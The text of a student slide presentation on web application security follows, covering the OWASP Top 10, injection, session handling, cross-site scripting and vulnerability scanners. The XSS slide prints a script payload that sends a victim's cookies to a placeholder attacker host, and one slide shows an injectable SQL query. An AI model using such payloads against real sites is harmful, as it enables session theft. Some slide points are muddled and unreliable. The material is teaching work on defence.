Web Application Security

CS200 PROJECT PRESENTATION

INSTRUCTOR: DR. FERDOUS AHMED

REFERENCE: HTTP://WWW.OWASP.ORG

1

Presented by:

Md Syed Ahamad

Project Role

Theory

Analysis

Implementation

2

Topics

Introduction

Issues and solutions – OWASP

Problems analysis

Vulnerabilities

preventions

Common Mistakes

Ways of approach

Vulnerabilities Scanner

3

Background

Many sensitive task are done through web

Online banking, online shopping etc.

Database access

System administration

Web applications and web users are targets of many attacks

Network based attacks

Injection

Broken Authentication and Session Managements

Cross site scripting

And many more…

4

Introduction

Web Application

Web Browser communicates with Web Server to retrieve web pages.

Web Application Security

Deals specially with security of Web Applications

Client – Server structure

5

Fundamentals of Web Apps.

Uniform Resource Locator(URL)

uniquely identify the location of a web page

tells about type of communication, OS type, the type of web app.

code, and more.

URL manipulation – a web application attack

6

Fundamentals of Web Apps.

HTTP

designates how the web browser and the web server communicate

with each other.

Stateless protocol – a request is sent and a response is received after a

connection is established.

Post Data

Another portion of an HTTP request

used when larger amounts of data need to be sent from the browser to

the web server

Cookies

Small amount of data supplied by web server and stored by web

browser

7

HTTP Request and Response

Request – get

Response – post

8

• Attack

• HTTP smuggling

• Cache Poisioning

Fundamentals of Web Apps.

HTTPS

HTTP wrapped with

Secure Sockets Layer

(SSL) encryption.

Data sent is encrypted.

Protects data in transit.

9

Fundamentals of Web Apps. 10

Firewall

prevent unauthorized connections to protected network devices.

Protect from network based attacks.

Fail to protect web based attacks

Issues – Web based attacks

OWASP

An online Community dedicated to web application Security.

It includes corporations, educational organizations, and individuals from

around the world.

OWASP Top 10 – most important to discuss.

to raise awareness about app. security by identifying some of the critical

risks organisations.

Analyse clearly and solve the problems.

11

Applications Security Risks

Attackers use different path to harm you.

These factors determine the overall risk.

12

My Risks

OWASP Risk Rating Methodology

13

OWASP Top 10

A1 – Injection

A2 – Broken Authentication and Session Managements

A3 – Cross Site Scripting (XSS)

A4 – Insecure Direct Object References

A5 – Security Misconfiguration

A6 – Sensitive Data Exposure

A7 – Missing Function level Access Control

A8 – Cross Site Request Forgery (CSRF)

A9 – Using Known Vulnerable Components

A10 – Invalidated Redirects and forwards

14

A1 - Injection

Injection flaws – Sql, OS, LDAP etc.

Data is sent to server as command and query.

most prevalent and dangerous attacks on the Internet.

15

A1 - Injection

Vulnerabilities

Use of interpreter that clearly separates untrusted data, command or

query

Avoid dynamic query, use stored procedures, prepared statements.

Use of Code checking tools, penetration testers.

Preventions

Use of safe API.

Escape special characters.

No special characters – Positive or “white list” input validation.

16

A1 – Injection

Example

Scenario #1

String query = "SELECT * FROM accounts WHERE custID='" + request.getParameter("id") + "'";

Select data from table where emailinput=‘email_input’;

17

A2 – Broken Authentication and

Session Management

App. Related to session and authentication are not implemented correctly.

Attackers try to compromise passwords, keys, or session tokens or user IDs.

18

A2 – Broken Authentication and

Session Management Vulnerabilities

User IDs are not protected when stored using Hashing and encryption.

guessed or overwritten through weak ac. Management.

Session ID as exposed, don’t time out, don’t rotate after login etc.

Preventions

OWASP’s Application Security Verification Standard (ASVS).

simple interface for developers.

Strong effort to avoid XSS flaws.

19

A2 – Broken Authentication and

Session Management

Example

Scenario #1: Airline reservations application supports URL rewriting,

putting session IDs in the URL:

http://example.com/sale/saleitems;jsessionid=2P0OC2JSNDLPSKHCJUN2JV?dest=Hawaii

20

A3 – Cross Site Scripting

Malicious code are injected to website.

Stored, reflected and DOM based.

21

A3 – Cross Site Scripting

Vulnerabilities

Input not properly escaped.

Input validated.

22

A3 – Cross Site Scripting

Example

The application uses untrusted data in the construction of the following

HTML snippet without validation or escaping:

(String) page += "<input name='creditcard' type='TEXT‘ value='" + request.getParameter("CC") + "'>";

The attacker modifies the ‘CC’ parameter in his browser to:

'><script>document.location= 'http://www.attacker.com/cgi-bin/cookie.cgi? foo='+document.cookie</script>'.

23

Way of approach

SSL

Website Vulnerability Scanner

Types

Network scanner

Port scanner

Web app. Security scanner

24

Vulnerability Scanner

Acunetix Web Vulnerability Scanner

Cenzic Hailstorm

GFI LANguard Network Security Scanner

Teneble Nessus 3

Nmap

QualysGuard

Retina Network Security Scanner

SAINT Network Vulnerability Scanner

25

My Goal

To implement a prevention mechanism.

To implement a detection mechanism.

26